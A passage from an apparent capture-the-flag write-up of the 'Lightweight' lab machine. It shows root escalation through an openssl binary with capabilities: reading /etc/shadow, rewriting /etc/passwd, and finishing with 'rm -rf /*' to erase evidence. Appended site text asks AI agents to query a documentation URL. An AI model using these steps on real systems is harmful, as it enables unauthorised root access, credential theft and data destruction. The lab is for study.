uid=1000(ldapuser1) gid=1000(ldapuser1) groups=1000(ldapuser1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[ldapuser1@lightweight ~]$ sudo -l
[sudo] password for ldapuser1:
Sorry, user ldapuser1 may not run sudo on lightweight.

[ldapuser1@lightweight ~]$ getcap -r *
openssl =ep
tcpdump = cap_net_admin,cap_net_raw+ep
```

{% endcode %}

Openssl with capabilities, we can make use of it, go to <https://gtfobins.github.io/gtfobins/openssl/#file-read> and try to abuse from that

{% code title="Target Terminal \[ldapuser1]" %}

```bash
# Testing the exploit
[ldapuser1@lightweight ~]$ cat /etc/shadow
cat: /etc/shadow: Permission denied

[ldapuser1@lightweight ~]$ ./openssl enc -in "/etc/shadow"
root:$6$eVOz8tJs$xpjymy5BFFeCIHq9a.BoKZeyPReKd7pwoXnxFNOa7TP5ltNmSDsiyuS/ZqTgAGNEbx5jyZpCnbf8xIJ0Po6N8.:17711:0:99999:7:::
bin:*:17632:0:99999:7:::
daemon:*:17632:0:99999:7:::
<...>
```

{% endcode %}

{% code title="Target Terminal \[ldapuser1]" %}

```bash
[ldapuser1@lightweight ~]$ ./openssl enc -in "/root/root.txt"
59e97417b2a124939865fe588a731e8b
```

{% endcode %}

We could even get the flag by this way, But we want to do a privilege scalation by modifying the root's password… let's go to <https://gtfobins.github.io/gtfobins/openssl/#file-write> to modify /etc/passwd

{% code title="Target Terminal \[ldapuser1]" %}

```bash
$ cd ~

$ cp /etc/passwd passwd

$ openssl passwd   # Here I used 'hello' as password
Password: #hello
Verifying - Password: # hello
z4oRRkp3WBrCc # Save this
```

{% endcode %}

{% code title="Local Terminal" %}

```bash
$ hashid z4oRRkp3WBrCc
Analyzing 'z4oRRkp3WBrCc'
[+] DES(Unix)
[+] Traditional DES
[+] DEScrypt
```

{% endcode %}

{% code title="Target Terminal \[ldapuser1]" %}

```bash
$ nano passwd
```

{% endcode %}

Replace the "X" with "z4oRRkp3WBrCc"

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F7E0Yug9g0DHPgGE4A0Wq%2Fimage.png?alt=media&#x26;token=1a50b450-96bd-4979-a932-11ad86fda120" alt=""><figcaption></figcaption></figure>

With this, the machine will not extract the password from **/etc/shadow** and decrypt with SHA512 {Check with at TargetSSH: grep "ENCRYPT\_METHOD" /etc/login.defs}, and just read it from passwd… with the capability in the Openssl, we will replace the password file.

{% code title="Target Terminal \[ldapuser1]" %}

```bash
$ cat passwd | ./openssl enc -out /etc/passwd
# No message, it works.
$ cat /etc/passwd
root:z4oRRkp3WBrCc:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
<...>

$ su root #using hello as password
```

{% endcode %}

{% code title="Target Terminal \[root]" %}

```bash
$ cd /root
$ cat /root/root.txt

$ rm -rf /* # To remove all the evidence
```

{% endcode %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://robertos-notebook.gitbook.io/cybersecurity/hack-the-box/old-machines/medium-machine/lightweight.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.